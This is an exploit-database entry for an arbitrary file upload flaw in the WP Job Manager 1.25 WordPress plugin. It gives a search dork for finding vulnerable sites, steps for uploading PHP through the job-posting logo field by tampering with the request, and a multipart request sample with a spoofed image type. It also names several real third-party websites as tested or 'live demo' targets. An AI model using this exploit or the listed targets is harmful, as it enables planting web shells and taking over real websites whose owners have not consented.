Wordpress Job Manager 1.25 Arbitrary File Upload Vulnerability

2016-10-04T00:00:00
ID 1337DAY-ID-25277
Type zdt
Reporter xBADGIRL21
Modified 2016-10-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################
# Exploit Title : Wordpress WP Job Manager 1.25 Arbitrary File Upload Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:/wp-content/uploads/job-manager-uploads
# Software link : http://downloads.wordpress.org/plugin/wp-job-manager.latest-stable.zip
# Vendor Homepage : https://wpjobmanager.com/
# version : 1.25.0
# Tested on: [ Windows ]
# skype:xbadgirl21
# Date: 2016/07/11
# video Proof : https://youtu.be/nx-WtfdOkLc
######################
# [+] DESCRIPTION :
######################
# [+] WP Job Manager is a lightweight plugin for adding job-board functionality to your WordPress site.
# [+] An arbitrary file upload web vulnerability has been detected in the WP Job Manager 1.25 and below.
# [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory
######################
# [+] USAGE :
######################
# 1.- SELECT A WEBSITE FROM THE DORK ABOVE
# 2.- GO TO POST A JOB URL <HOST><WP-PATH>/post-a-job/ [or] Look for it
# 3.- Fill all the Fields No need to Register or Preview Then in Logo upload your FILE.jpg
# 4.- Using Tamper Data or HTTP LIVE Headers change your FILE.TXT OR PHP
# 5.- Go to url "http(s)://<wp-host>/<wp-path>/wp-content/uploads/job-manager-uploads/company_logo/<Year/month>/<your-file-name>"
######################
# [+] Poc :
######################
# -----------------------------18132430516394rn
# Content-Disposition: form-data; name="script"rn
# rn
# truern
# -----------------------------18132430516394rn
# Content-Disposition: form-data; name="company_logo"; filename="x.txt"rn
# Content-Type: image/jpegrn
# rn
######################
# [+] Test :
######################
# http://sala.sk.ca/wp-content/uploads/job-manager-uploads/company_logo//2016//07/xx.txt
# http://www.ruralhumanservices.org/wp-content/uploads/job-manager-uploads/company_logo/2016//07/xx.txt
######################
# [+] File Path :
######################
# http(s)://<wp-host>/<wp-path>/wp-content/uploads/job-manager-uploads/company_logo/2016//07/x.txt
######################
# [+] Live Demo :
######################
# http://www.ruralhumanservices.org/post-a-job/
# http://sala.sk.ca/post-a-job/
# http://www.elmundodeltransporte.com/publica-una-oferta-laboral
#
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################

#  0day.today [2018-04-05]  #